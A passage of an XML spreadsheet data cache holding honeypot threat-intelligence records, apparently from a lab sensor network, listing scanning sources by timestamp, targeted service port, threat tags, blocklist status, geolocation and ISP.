    <s v="NA&amp;&amp;connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Content-Length': '0', 'Host': '66.94.127.183:80', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cf87:e504"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3237"/>
    <x v="3237"/>
    <s v="114-35-151-95.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-04T04:26:55"/>
    <d v="2025-01-19T09:38:20"/>
    <d v="2025-04-04T04:26:55"/>
    <n v="181"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H7"/>
    <s v="23&amp;&amp;NA&amp;&amp;9100&amp;&amp;80&amp;&amp;34482"/>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2008-04-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7223:975f"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3238"/>
    <x v="3238"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T03:56:06"/>
    <d v="2025-04-04T03:56:06"/>
    <d v="2025-04-04T03:56:06"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Dakshin Kannad"/>
    <s v="Mangaluru"/>
    <s v="1263780"/>
    <s v="575001"/>
    <s v="12.9141"/>
    <s v="74.856"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b63c:2fee"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3239"/>
    <x v="3239"/>
    <s v="220-135-2-149.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-04T03:36:17"/>
    <d v="2024-12-17T04:21:59"/>
    <d v="2025-04-04T03:36:17"/>
    <n v="415"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H16"/>
    <s v="23&amp;&amp;NA&amp;&amp;39723"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET: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dc87:295"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3240"/>
    <x v="3240"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T03:29:49"/>
    <d v="2025-04-04T03:24:19"/>
    <d v="2025-04-04T03:29:49"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_POSTGRES_HC1"/>
    <s v="5432"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Hoan Kiem"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="7552"/>
    <s v="Viettel Group"/>
    <s v="Viettel Corporation"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-05-21"/>
    <s v="VIETTEL-VN"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_POSTGRES:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7502:d29b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3241"/>
    <x v="3241"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T03:24:55"/>
    <d v="2025-04-04T01:17:18"/>
    <d v="2025-04-04T03:24:55"/>
    <n v="25"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H38"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IL"/>
    <s v="Israel"/>
    <s v="M"/>
    <s v="Central District"/>
    <s v="Petach Tikva"/>
    <s v="Petah Tikva"/>
    <s v="293918"/>
    <s v="NA"/>
    <s v="32.0887"/>
    <s v="34.8569"/>
    <s v="12400"/>
    <s v="Partner Communications Ltd."/>
    <s v="012 Smile"/>
    <s v="business"/>
    <s v="012 Smile Communications LTD."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2e79:4c53"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3242"/>
    <x v="3242"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T03:15:20"/>
    <d v="2025-04-04T03:15:20"/>
    <d v="2025-04-04T03:15:20"/>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3b5d:89cf"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3243"/>
    <x v="3243"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T03:07:18"/>
    <d v="2025-04-04T03:07:18"/>
    <d v="2025-04-04T03:07:18"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="ZW"/>
    <s v="Zimbabwe"/>
    <s v="MI"/>
    <s v="Midlands Province"/>
    <s v="NA"/>
    <s v="Gweru"/>
    <s v="890422"/>
    <s v="NA"/>
    <s v="-19.45"/>
    <s v="29.8167"/>
    <s v="37332"/>
    <s v="ZOL"/>
    <s v="Zimbabwe Online"/>
    <s v="corporate"/>
    <s v="Liquid Telecommunications Operations Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:29af:c919"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3244"/>
    <x v="3244"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T03:06:26"/>
    <d v="2025-04-04T02:38:01"/>
    <d v="2025-04-04T03:06:26"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Blackpool"/>
    <s v="Great Marton"/>
    <s v="6694342"/>
    <s v="NA"/>
    <s v="53.8119"/>
    <s v="-3.02261"/>
    <s v="9009"/>
    <s v="M247 Europe SRL"/>
    <s v="M247 Europe Infra"/>
    <s v="hosting"/>
    <s v="M247 Ltd Manchester"/>
    <s v="None"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9246:84cc"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3245"/>
    <x v="3245"/>
    <s v="dynamic-077-003-134-002.77.3.pool.telefonica.de"/>
    <x v="0"/>
    <d v="2025-04-04T02:35:58"/>
    <d v="2025-04-04T02:35:58"/>
    <d v="2025-04-04T02:35:58"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="DE"/>
    <s v="Germany"/>
    <s v="HH"/>
    <s v="Hamburg"/>
    <s v="Hamburg"/>
    <s v="Hamburg"/>
    <s v="2911298"/>
    <s v="20454"/>
    <s v="53.5488"/>
    <s v="9.98717"/>
    <s v="6805"/>
    <s v="TDDE-ASN1"/>
    <s v="Telefonica Deutschland GmbH"/>
    <s v="corporate"/>
    <s v="Telefonica Deutschland GmbH"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2023-12-20 09:32:58"/>
    <s v="['ns1.telefonica.de 62.52.156.92', 'ns2.telefonica.de 213.191.76.196', 'ns3.telefonica.de 62.52.156.84']"/>
    <s v="NA"/>
    <s v="connect"/>
    <s v="None"/>
    <x v="1"/>
    <s v="None"/>
    <s v="None"/>
    <s v="::ffff:4d03:8602"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3246"/>
    <x v="3246"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T02:16:38"/>
    <d v="2025-04-03T17:10:02"/>
    <d v="2025-04-04T02:16:38"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H43"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c5:8204"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3247"/>
    <x v="3247"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T02:12:20"/>
    <d v="2025-04-04T02:12:20"/>
    <d v="2025-04-04T02:12:20"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>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f:6d5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3248"/>
    <x v="3248"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T02:10:02"/>
    <d v="2025-04-04T02:10:02"/>
    <d v="2025-04-04T02:10:02"/>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harat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d03:11f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3249"/>
    <x v="3249"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T01:40:27"/>
    <d v="2025-04-04T01:40:27"/>
    <d v="2025-04-04T01:40:27"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="UY"/>
    <s v="Uruguay"/>
    <s v="MO"/>
    <s v="Montevideo Department"/>
    <s v="Municipio B"/>
    <s v="Montevideo"/>
    <s v="3441575"/>
    <s v="NA"/>
    <s v="-34.9033"/>
    <s v="-56.1882"/>
    <s v="6057"/>
    <s v="AS6057"/>
    <s v="Administracion Nacional de Telecomunicaciones"/>
    <s v="corporate"/>
    <s v="Administracion Nacional de Telecomunicaciones"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a73c:ae0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3250"/>
    <x v="3250"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T01:38:02"/>
    <d v="2025-04-04T01:38:02"/>
    <d v="2025-04-04T01:38:02"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:f3e0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3251"/>
    <x v="3251"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T01:21:35"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-04T01:21:35"/>
    <n v="122"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H28&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_DHCP_H19&amp;&amp;SMA-LAB_MT-CPA_H39&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H24&amp;&amp;SMA-LAB_SMB_H23&amp;&amp;SMA-LAB_MT-CPA_H24"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;34741&amp;&amp;67&amp;&amp;13956&amp;&amp;1433&amp;&amp;445&amp;&amp;59013&amp;&amp;58992"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="GE"/>
    <s v="Georgia"/>
    <s v="TB"/>
    <s v="T'bilisi"/>
    <s v="Didi digomi"/>
    <s v="Tbilisi"/>
    <s v="611717"/>
    <s v="NA"/>
    <s v="41.7151"/>
    <s v="44.8271"/>
    <s v="16010"/>
    <s v="Magticom Ltd."/>
    <s v="MAGTI-BROADBAND"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA&amp;&amp;connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_SMB:Incoming connection (5.178.236.121,58021)}&amp;&amp;{Data_SMB:Incoming connection (5.178.236.121,58579)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (5.178.236.121,51259)}&amp;&amp;{Data_SMB:Incoming connection (5.178.236.121,51717)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (5.178.236.121,52905)}&amp;&amp;{Data_SMB:Incoming connection (5.178.236.121,53697)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5b2:ec79"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3252"/>
    <x v="3252"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T00:25:27"/>
    <d v="2025-04-04T00:25:27"/>
    <d v="2025-04-04T00:25:27"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:52c0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3253"/>
    <x v="3253"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T00:13:01"/>
    <d v="2025-03-17T02:09:19"/>
    <d v="2025-04-04T00:13:01"/>
    <n v="7"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="high"/>
    <s v="SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_MYSQL_HC1"/>
    <s v="57859&amp;&amp;3306&amp;&amp;47127"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IR"/>
    <s v="Iran"/>
    <s v="23"/>
    <s v="Tehran"/>
    <s v="Shahrestān-e Tehrān"/>
    <s v="Tehrān (District 2)"/>
    <s v="6659608"/>
    <s v="NA"/>
    <s v="35.7863"/>
    <s v="51.3811"/>
    <s v="60631"/>
    <s v="Pars Parva System LLC"/>
    <s v="Pars Parva System LLC"/>
    <s v="business"/>
    <s v="ParsParvaSystem"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA&amp;&amp;connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b2ef:9745"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3254"/>
    <x v="3254"/>
